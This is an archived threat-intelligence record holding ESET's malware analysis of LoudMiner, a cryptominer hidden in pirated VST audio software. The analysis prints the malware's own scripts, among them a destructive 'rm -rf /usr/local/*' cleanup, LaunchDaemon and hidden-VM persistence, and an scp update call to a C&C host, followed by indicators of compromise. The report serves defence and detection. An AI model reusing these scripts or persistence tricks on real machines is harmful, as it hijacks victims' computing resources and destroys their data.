{
	"id": "095309e9-a9ce-4cc1-8ada-8e8929483c64",
	"created_at": "2026-04-06T00:13:08.57636Z",
	"updated_at": "2026-04-10T13:12:49.598595Z",
	"deleted_at": null,
	"sha1_hash": "1b370fc97d36bfa897803e2e7708ac589f09281f",
	"title": "LoudMiner: Cross-platform mining in cracked VST software",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 522737,
	"plain_text": "LoudMiner: Cross-platform mining in cracked VST software\r\nBy ESET ResearchMichal Malik\r\nArchived: 2026-04-05 22:54:26 UTC\r\nIntroduction\r\nLoudMiner is an unusual case of a persistent cryptocurrency miner, distributed for macOS and Windows since August 2018.\r\nIt uses virtualization software – QEMU on macOS and VirtualBox on Windows – to mine cryptocurrency on a Tiny Core\r\nLinux virtual machine, making it cross platform. It comes bundled with pirated copies of VST software. The miner itself is\r\nbased on XMRig (Monero) and uses a mining pool, thus it is impossible to retrace potential transactions.\r\nDistribution\r\nAt the time of writing, there are 137 VST-related applications (42 for Windows and 95 for macOS) available on a single\r\nWordPress-based website with a domain registered on 24 August, 2018. The first application – Kontakt Native Instruments\r\n5.7 for Windows – was uploaded on the same day. The size of the apps makes it impractical to analyze them all, but it seems\r\nsafe to assume they are all Trojanized.\r\nThe applications themselves are not hosted on the WordPress-based site, but on 29 external servers, which can be found in\r\nthe IoCs section. The admins of the site also frequently update the applications with newer versions, making it difficult to\r\ntrack the very first version of the miner.\r\nRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production;\r\nthus, the machines that they are installed on should have good processing power and high CPU consumption will not\r\nsurprise the users. Also, these applications are usually complex, so it is not unexpected for them to be huge files. The\r\nattackers use this to their advantage to camouflage their VM images. 
Moreover, the decision to use virtual machines instead\r\nof a leaner solution is quite remarkable and this is not something we routinely see.\r\nHere are some examples of applications, as well as some comments you can find on the website:\r\nPropellerhead Reason\r\nAbleton Live\r\nSylenth1\r\nNexus\r\nReaktor 6\r\nAutoTune\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 1 of 13\n\nFigure 1. Comment #1 from the \"admin\"\r\nFigure 2. Comment #2 from the \"admin\"\r\nUser reports\r\nWe found several forum threads of users complaining about a qemu-system-x86_64 process taking 100% of their CPU on\r\ntheir Mac:\r\nFigure 3. User report #1 (https://discussions.apple.com/thread/250064603)\r\nFigure 4. User report #2 (https://toster.ru/q/608325)\r\nA user named “Macloni” (https://discussions.apple.com/thread/8602989) said the following:\r\n“Unfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site\r\nand not from the official site, installs a miner too, running at the background causing this.” The same user attached\r\nscreenshots of the Activity Monitor indicating 2 processes – qemu-system-x86_64 and tools-service – taking 25% of CPU\r\nresources and running as root.\r\nAnalysis of pirated applications\r\nThe general idea of both macOS and Windows analyses stays the same:\r\n1. An application is bundled with virtualization software, a Linux image and additional files used to achieve\r\npersistence.\r\n2. User downloads the application and follows attached instructions on how to install it.\r\n3. LoudMiner is installed first, the actual VST software after.\r\n4. LoudMiner hides itself and becomes persistent on reboot.\r\n5. 
The Linux virtual machine is launched and the mining starts.\r\n6. Scripts inside the virtual machine can contact the C\u0026C server to update the miner (configuration and binaries).\r\nWhile analyzing the different applications, we’ve identified four versions of the miner, mostly based on how it’s bundled\r\nwith the actual software, the C\u0026C server domain, and something we believe is a version string created by the author.\r\nmacOS\r\nWe’ve identified three macOS versions of this malware so far. All of them include dependencies needed to run QEMU in\r\ninstallerdata.dmg from which all files are copied over to /usr/local/bin and have appropriate permissions set along the way.\r\nEach version of the miner can run two images at once, each taking 128 MB of RAM and one CPU core. Persistence is\r\nachieved by adding plist files in /Library/LaunchDaemons with RunAtLoad set to true. They also have KeepAlive set to\r\ntrue, ensuring the process will be restarted if stopped. Each version has these components:\r\n1. QEMU Linux images.\r\n2. Shell scripts used to launch the QEMU images.\r\n3. Daemons used to start the shell scripts at boot and keep them running.\r\n4. A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and\r\nwhether the Activity Monitor process is running.\r\nThe CPU monitor script can start and stop the mining by loading and unloading the daemon. If the Activity Monitor process\r\nis running, the mining stops. Otherwise, it checks for how long the system has been idle in seconds:\r\nioreg -c IOHIDSystem | awk '/HIDIdleTime/ {print $NF/1000000000; exit}'\r\nIf it’s been longer than 2 minutes, it starts the mining. If it’s been less than 2 minutes, it checks the total CPU usage:\r\nps -A -o %cpu | awk '{s+=$1} END {print s }'\r\ndivides that by the number of CPU cores:\r\nsysctl hw.logicalcpu |awk '{print $2 }'\r\nand if it’s greater than 85%, it stops the mining. 
The script itself is a bit different across versions, but the general idea stays\r\nthe same.\r\nAfter the installation is done, all miner-related installation files are deleted.\r\nFigure 5. Installation of Polyverse.Music.Manipulator.v1.0.1.macOS.dmg\r\nFigure 6. Polyverse.Music.Manipulator.v1.0.1.macOS.dmg setup instructions\r\nVersion 1\r\nThe miner files in the downloaded application package are not obfuscated in any way or placed in another package; they are\r\ninstalled alongside the software in the following places:\r\n/Library/Application Support/.Qemusys\r\nqemu-system-x86_64 – clean QEMU binary\r\nsys00_1-disk001.qcow2 – Linux image (first)\r\nqemuservice – shell script that launches the first image via the qemu-system-x86_64 binary (see Script 1\r\nlisting)\r\n/Library/Application Support/.System-Monitor\r\nsystem-monitor.daemon – launches first image via system-monitor binary\r\n/usr/local/bin\r\n.Tools-Service\r\nsys00_1-disk001.qcow2 – Linux image (second)\r\ntools-service.daemon – launches second image via tools-service binary\r\ncpumonitor – starts/stops mining based on idle time and CPU usage\r\nsystem-monitor – copy of qemu-system-x86_64 binary\r\ntools-service – copy of qemu-system-x86_64 binary\r\n/Library/LaunchDaemons\r\nbuildtools.system-monitor.plist – launches system-monitor.daemon\r\nbuildtools.tools-service.plist – launches tools-service.daemon\r\nmodulesys.qemuservice.plist – launches qemuservice\r\nsystools.cpumonitor.plist – launches cpumonitor\r\n#!/bin/bash\r\nfunction start {\r\npgrep \"Activity Monitor\"\r\nif [ $? 
-eq 0 ]; then\r\nlaunchctl unload -w /Library/LaunchDaemons/com.modulesys.qemuservice.plist\r\nelse\r\n/usr/local/bin/qemu-system-x86_64 -M accel=hvf --cpu host /Library/Application\\ Support/.Qemusys/sys00_1-disk001.qcow2 -di\r\nfi\r\n}\r\nstart;\r\nScript 1. qemuservice shell script\r\nAfter the dependencies are copied over, all miner-related daemons are launched and then the actual software is installed:\r\nqemuservice won’t launch the image if the Activity Monitor process is running. In fact, if it is running, it will unload\r\nthe plist that it was launched by.\r\ntools-service.daemon will launch the image only when the qemu-system-x86_64 process is not running and after\r\nsleeping for 45 minutes.\r\nsystem-monitor.daemon will launch the image only if an Intel i5, i7 or i9 CPU is detected.\r\nThese scripts use the same command to launch the QEMU image, only differing in names and the image path.\r\nWe’ve found the following screenshot related to version 1 of the miner:\r\nFigure 7. CPU consumption of QEMU with Little Snitch (source: https://imgur.com/a/sc3u6kk)\r\nIt is from Little Snitch indicating that some connections from the process qemu-system-x86_64 were blocked. Specifically,\r\nhopto[.]org (a free hostname service) is a C\u0026C used by version 1 of the miner.\r\nVersion 2\r\nMiner files are in data_installer.pkg inside the downloaded application package. data_installer.pkg is installed first, then the\r\nVST software. 
Before installation, version 1 of the miner is removed, and the following command is executed:\r\nrm -rf /usr/local/*\r\nAs seen in the listing in Script 2, it only does so when it detects a running qemu-system-x86_64 process.\r\n#!/bin/bash\r\n#Clear Old\r\nfunction clear {\r\nLGC=`ps aux |grep \"qemu-system-x86_64\" |wc -l`\r\nif [ $LGC -ge 2 ]\r\nthen\r\nlaunchctl unload -w /Library/LaunchDaemons/com.modulesys.qemuservice.plist\r\nlaunchctl unload -w /Library/LaunchDaemons/com.buildtools.tools-service.plist\r\nlaunchctl unload -w /Library/LaunchDaemons/com.buildtools.system-monitor.plist\r\nlaunchctl unload -w /Library/LaunchDaemons/com.systools.cpumonitor.plist\r\nrm -f /Library/LaunchDaemons/com.buildtools.system-monitor.plist\r\nrm -f /Library/LaunchDaemons/com.modulesys.qemuservice.plist\r\nrm -f /Library/LaunchDaemons/com.buildtools.tools-service.plist\r\nrm -f /Library/LaunchDaemons/com.systools.cpumonitor.plist\r\nrm -rf /Library/Application\\ Support/.Qemusys\r\nrm -rf /usr/local/bin/.Tools-Service\r\nrm -rf /Library/Application\\ Support/.System-Monitor/\r\nrm -rf /usr/local/*\r\nfi\r\nexit 0\r\n}\r\nclear;\r\nScript 2. data_installer.pkg preinstall script that removes version 1\r\nThe following temporary files are created:\r\n/Users/Shared\r\nz1 - QEMU binary\r\nz1.daemon - launches the QEMU image with the QEMU binary\r\nz1.qcow2 - QEMU image\r\nz1.plist - launches z1.daemon\r\nz3 – CPU monitor script, little change from version 1 cpumonitor\r\nz3.plist - used to launch z3\r\nrandwd - generates random names\r\nAfter dependencies are copied over, the miner is installed. This time the names of QEMU binaries, plists and directories are\r\nrandomized with the randwd script. The miner installation creates two copies of z1, z1.daemon, z1.qcow2 and z1.plist. 
For\r\neach copy, the following happens:\r\nA directory with a random name is created in /Library/Application Support\r\nThe QEMU binary z1 carries the same name as the directory and is copied into /usr/local/bin\r\nz1.daemon (see listing in Script 3) and z1.qcow2 are copied into this directory under their random names\r\nz1.plist is copied with the name com.\u003crandom_name\u003e.plist into /Library/LaunchDaemons\r\nz1.daemon, z1.plist, z3 and z3.plist files serve as templates. References to other scripts, binaries, plists, etc. in these files are\r\nreplaced by their corresponding generated random name.\r\nA random name is also chosen for the CPU monitor (z3) shell script and its accompanying plist file. z3 is copied into\r\n/usr/local/bin and the plist into /Library/LaunchDaemons under the name com.\u003crandom_name\u003e.plist.\r\n#!/bin/bash\r\nfunction start {\r\npgrep \"Activity Monitor\"\r\nif [ $? -eq 0 ]; then\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 7 of 13\n\nlaunchctl unload -w /Library/LaunchDaemons/com.AAAA.plist\r\nelse\r\n/usr/local/bin/BBBB -M accel=hvf --cpu host /Library/Application\\ Support/CCCC/DDDD -display none\r\nfi\r\n}\r\nstart;\r\nScript 3. z1.daemon shell script\r\nVersion 2 is a bit cleaner and/or simpler than version 1. There is only one QEMU image, with two copies made; same for the\r\nimage launcher scripts, daemons and the cpumonitor. Even though version 2 randomizes its filenames and directories, it can\r\nonly be installed once because the installation checks for running processes with accel=hvf in their command line.\r\nFrom the version 2 applications we’ve checked so far, the SHA1 hash of the data_installer.pkg is always\r\n39a7e86368f0e68a86cce975fd9d8c254a86ed93.\r\nVersion 3\r\nThe miner files are in an encrypted DMG file, called do.dmg, inside the application package. The DMG is mounted with the\r\nfollowing command:\r\nprintf '%s\\0' 'VeryEasyPass123!' 
| hdiutil attach -noverify /Users/Shared/instapack/do.dmg -stdinpass\r\nThe miner DMG contains a single package: datainstallero.pkg. This and the software package are then installed.\r\nThe package contents of datainstallero.pkg and data_installer.pkg from version 2 are more or less the same, but\r\ndatainstallero.pkg adds two obfuscated scripts – clearpacko.sh and installpacko.sh – and obfuscates an existing script –\r\nrandwd:\r\nclearpacko.sh removes version 1 of the miner like version 2 does.\r\ninstallpacko.sh installs the miner the same way version 2 does, except the comments have been stripped from the\r\nscript.\r\nThe SHA1 of the do.dmg remains the same as well: b676fdf3ece1ac4f96a2ff3abc7df31c7b867fb9.\r\nLaunching the Linux image\r\nAll versions use multiple shell scripts to launch the images. The shell scripts are executed by plists on boot and are kept\r\nalive.\r\nVersion 1 executes the following binaries (copies of qemu-system-x86_64) to launch the QEMU images: qemu-system-x86_64, system-monitor, tools-service.\r\nVersions 2 and 3 use the same command, but the filename of the binary, the directory in Application Support and the\r\nQEMU image filename are randomized.\r\nAll versions use the following switches:\r\n-M accel=hvf to use the Hypervisor framework as an accelerator. HVF was introduced with OS X 10.10 and support\r\nfor HVF was added in QEMU 2.12, which was released in April 2018.\r\n-display none so the virtual machine runs without a graphical interface.\r\nSince the image is launched without specifying the amount of RAM and the number of CPU cores, the default values are used: 1 CPU\r\ncore and 128MB of RAM. All versions can launch 2 images.\r\nWindows (version 4)\r\nFrom the strings we extracted from the application, we define the only Windows version seen so far as version 4. As we\r\nmentioned earlier, the logic is quite similar to the macOS version. 
Each Windows application is packaged as an MSI installer\r\nthat installs both the “cracked” application and VirtualBox. Figure 8 shows the trust popup for installing the VirtualBox driver when\r\nrunning a “cracked” VST installer from vstcrack[.]com.\r\nFigure 8. Trust popup for a VirtualBox driver when running the installation of an application from vstcrack[.]com\r\nVirtualBox is installed in its usual folder name (C:\\Program Files\\Oracle); however, the attributes of the directory are set to\r\n“hidden”. Then the installer copies the Linux image and VBoxVmService (a Windows service used to run a VirtualBox\r\nvirtual machine as a service) into C:\\vms, which is also a hidden directory. Once the installation is complete, the installer\r\nruns a batch script compiled with BAT2EXE (see the unpacked listing in Script 4) to import the Linux image and run\r\nVmServiceControl.exe to start the virtual machine as a service.\r\n@echo off\r\nsetlocal EnableExtensions EnableDelayedExpansion\r\n\"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage.exe\" setproperty machinefolder \"%userprofile%\\appdata\\roaming\"\r\n\"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage.exe\" import \"c:\\vms\\tmp\\sys00_1.ova\"\r\nxcopy /Y \"C:\\Windows\\System32\\Config\\systemprofile\\.VirtualBox\" \"C:\\vms\\.VirtualBox\\\"\r\n\"C:\\vms\\VmServiceControl.exe\" -i\r\ndel /F \"c:\\vms\\tmp\\sys00_1.ova\"\r\nScript 4. Batch script used to run the Linux virtual machine as a service\r\nThis method is used to ensure the persistence of the miner after reboot. 
Indeed, VboxVmService comes with a configuration\r\nfile (see Script 5) in which it is possible to enable the AutoStart option so the virtual machine is automatically launched at\r\nstartup.\r\n[Settings]\r\nVBOX_USER_HOME=C:\\vms\\.VirtualBox\r\nRunWebService=no\r\nPauseShutdown=5000\r\n[Vm0]\r\nVmName=sys00_1\r\nShutdownMethod=acpipowerbutton\nAutoStart=yes\nScript 5. Configuration file for VBoxVmService with AutoStart enabled\nThe OVF file included in the Linux image describes the hardware configuration of the virtual machine (see Script 6): it uses\n1GB of RAM and 2 CPU cores (with a maximum usage of 90%).\nScript 6. Hardware configuration of the Linux image\nLinux image\nThe Linux image is Tiny Core Linux 9.0 configured to run XMRig, as well as some files and scripts to keep the miner\nupdated continuously. The most interesting files are:\n/root/.ssh/{id_rsa, id_rsa.pub} – the SSH key pair used to update the miner from the C\u0026C server using SCP.\n/opt/{bootsync.sh, bootlocal.sh} – the system startup commands that try to update the miner from the C\u0026C server\nand run it (see Scripts 7 and 8):\n/usr/bin/sethostname box\n/opt/bootlocal.sh 2\u003e\u00261 \u003e /dev/null \u0026\necho \"booting\" \u003e /etc/sysconfig/noautologin\nScript 7. bootsync.sh\n/mnt/sda1/tools/bin/idgenerator 2\u003e\u00261 \u003e /dev/null\n/mnt/sda1/tools/bin/xmrig_update 2\u003e\u00261 \u003e /dev/null\n/mnt/sda1/tools/bin/ccommand_update 2\u003e\u00261 \u003e /dev/null\n/mnt/sda1/tools/bin/ccommand 2\u003e\u00261 \u003e /dev/null\n/mnt/sda1/tools/bin/xmrig\nScript 8. 
bootlocal.sh\n/mnt/sda1/tools/bin – main files and scripts used to update and run the miner.\n/mnt/sda1/tools/xmrig – contains the source code of XMRig (from the GitHub repository).\nThe configuration of the miner is stored in /mnt/sda1/tools/bin/config.json and contains mostly the domain name and the\nport used for the mining pool, which can differ depending on the version (see examples in the IoCs section).\nThe update mechanism is performed via SCP (Secure File Copy) by three different scripts:\nxmrig_update - updates the configuration of the miner (config.json);\nccommand - updates ccommand_update, xmrig_update (see Script 9), updater.sh, xmrig;\nccommand_update - updates ccommand;\nFrom what we have seen, the miner configuration is updated once every day.\n#!/bin/sh\r\nping -w 40 127.0.0.1\r\ncd /mnt/sda1/tools/bin/ \u0026\u0026 scp -P 5100 -C -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null x01@system-update.is\r\nScript 9. xmrig_update\r\nIn order to identify a particular mining session, a file containing the IP address of the machine and the day’s date is created\r\nby the idgenerator script and its output is sent to the C\u0026C server by the updater.sh script.\r\nProtection\r\nObviously, the best advice to be protected against this kind of threat is to not download pirated copies of commercial\r\nsoftware. 
There are, however, some hints that can help you to identify when an application contains unwanted code:\r\nA trust popup from an unexpected, “additional” installer (in this case the Oracle network adapter).\r\nHigh CPU consumption by a process you did not install (QEMU or VirtualBox in this case).\r\nA new service added to the startup services list (Windows) or a new Launch Daemon (macOS).\r\nNetwork connections to curious domain names (such as system-update[.]info or system-check[.]services here).\r\nIndicators of Compromise (IoCs)\r\nHashes\r\nmacOS “cracked” applications (versions 1-3)\r\nSHA-1 Filename ESET detection name Version number\r\n71030028c4e1b844c85138bd77ddea96a190ec2c Virtual_DJ_8_Pro_Infinity_macOS.pkg OSX/LoudMiner.A 1\r\n32c80edcec4f7bb3b494e8949c6f2014b7f5db65 Native Instruments Massive Installer.pkg OSX/LoudMiner.A 1\r\n7dc9f8ca07cd8e0247cf15cd8d2da2190a02fc90 Massive_v1.5.5_Installer_macOS.dmg OSX/LoudMiner.B 2\r\n0b40bd0754637d5be2ada760ff0ecfda7afe03d7 Native_Instruments_Effects_Series_Mod_Pack.dmg OSX/LoudMiner.B 2\r\n88efc767a32299e922f1b41f82c8d584585e2161 Spectrasonics_Omnisphere_2.5_OSx.dmg OSX/LoudMiner.C 3\r\ne9c9d17d006fb03d67b736c0826df0af8ca6d5fd Lennar_Digital_Sylenth1_2.2.1.dmg OSX/LoudMiner.C 3\r\nWindows “cracked” applications (version 4)\r\nSHA-1 Filename ESET detection name\r\n23faacfc23cfef65504d7fa20854030b96a9df91 Ableton.Live.Suite.10.0.6.Multilingual.x64.WIN.zip Win32/LoudMiner.A\r\n5a8682eae69b2e11d45980941a972bd734630207 Infected-Mushroom-Manipulator-V1.0.3.zip Win32/LoudMiner.A\r\n60a8f1d4a028153271093e815e8267bd25fde852 Sonic_Academy_ANA_2.0.3_x86_x64.msi Win32/LoudMiner.A\r\n7c7876058783da85d5502b9406f7fb4d26f66238 SoundToys_5.0.1_x64-SetupFiles.rar Win32/LoudMiner.A\r\na1a1dc7876d71749a8bc5690c537451770ef4ab8 Valhalla-DSP-Full-Bundle-setupfiles.zip Win32/LoudMiner.A\r\nLinux images\r\nSHA-1 Filename 
Version number\r\ndd9b89a3c5a88fb679f098e2c2847d22350e23b1 sys00_1-disk001.qcow2 1\r\nd1e42e913da308812dd8da1601531b197c1a09a1 sys00_1-disk001.qcow2 1\r\n39a7e86368f0e68a86cce975fd9d8c254a86ed93 z1.qcow2 (renamed with a randomized name) 2\r\n59026ffa1aa7b60e5058a0795906d107170b9e0f z1.qcow2 (renamed with a randomized name) 3\r\nfcf5c3b560295ee330b97424b7354fd321757cc6 sys00_1.ova 4\r\nfc60431a0172d5b8cf4b34866567656467cf861c sys00_1.ova 4\r\nFilenames\r\nmacOS\r\n/Library/Application Support/.Qemusys\r\n/Library/Application Support/.System-Monitor\r\n/usr/local/bin/{.Tools-Service, cpumonitor, system-monitor, tools-service}\r\n/Library/LaunchDaemons/{com.buildtools.system-monitor.plist, com.buildtools.tools-service.plist,\r\ncom.modulesys.qemuservice.plist, com.systools.cpumonitor.plist}\r\nWindows\r\nC:\\vms\r\nHostnames\r\nvstcrack[.]com (137[.]74.151.144)\r\nDownload hosts (via HTTP on port 80)\r\n185[.]112.156.163\r\n185[.]112.156.29\r\n185[.]112.156.70\r\n185[.]112.157.102\r\n185[.]112.157.103\r\n185[.]112.157.105\r\n185[.]112.157.12\r\n185[.]112.157.181\r\n185[.]112.157.213\r\n185[.]112.157.24\r\n185[.]112.157.38\r\n185[.]112.157.49\r\n185[.]112.157.53\r\n185[.]112.157.65\r\n185[.]112.157.72\r\n185[.]112.157.79\r\n185[.]112.157.85\r\n185[.]112.157.99\r\n185[.]112.158.112\r\n185[.]112.158.133\r\n185[.]112.158.186\r\n185[.]112.158.190\r\n185[.]112.158.20\r\n185[.]112.158.3\r\n185[.]112.158.96\r\nd-d[.]host (185[.]112.158.44)\r\nd-d[.]live (185[.]112.156.227)\r\nd-d[.]space (185[.]112.157.79)\r\nm-m[.]icu (185[.]112.157.118)\r\nUpdate hosts (via SCP)\r\naly001[.]hopto.org (192[.]210.200.87, port 22)\r\nsystem-update[.]is (145[.]249.104.109, port 5100)\r\nMining hosts\r\nsystem-update[.]info (185[.]193.126.114, port 443 or 8080)\r\nsystem-check[.]services (82[.]221.139.161, port 8080)\r\nMITRE ATT\u0026CK techniques\r\nTactic ID Name Description\r\nExecution T1035 
Service Execution On Windows, the Linux image is run as a service with VboxVmService.\r\nPersistence T1050 New Service Install the Linux virtual machine as a service with VboxVmService.\r\nPersistence T1062 Hypervisor Install a type-2 hypervisor on the host (VirtualBox or QEMU) to run the miner.\r\nPersistence T1160 Launch Daemon The macOS versions use a Launch Daemon to ensure the persistence.\r\nDefense Evasion T1027 Obfuscated Files or Information Some shell scripts are obfuscated, and some installers are encrypted in macOS versions.\r\nDefense Evasion T1045 Software Packing Use BAT2EXE to pack batch script in Windows versions.\r\nDefense Evasion T1158 Hidden Files and Directories The VirtualBox installation folder and the directory containing the Linux image are hidden.\r\nCommand and Control T1043 Commonly Used Port Use TCP ports 443 and 8080 for mining pool communication.\r\nCommand and Control T1105 Remote File Copy Use SCP (port 22 or 5100) to copy files from/to the C\u0026C server.\r\nImpact T1496 Resource Hijacking Use victim machines to mine cryptocurrency (Monero).\r\nSource: https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/"
	],
	"report_names": [
		"loudminer-mining-cracked-vst-software"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434388,
	"ts_updated_at": 1775826769,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1b370fc97d36bfa897803e2e7708ac589f09281f.pdf",
		"text": "https://archive.orkl.eu/1b370fc97d36bfa897803e2e7708ac589f09281f.txt",
		"img": "https://archive.orkl.eu/1b370fc97d36bfa897803e2e7708ac589f09281f.jpg"
	}
}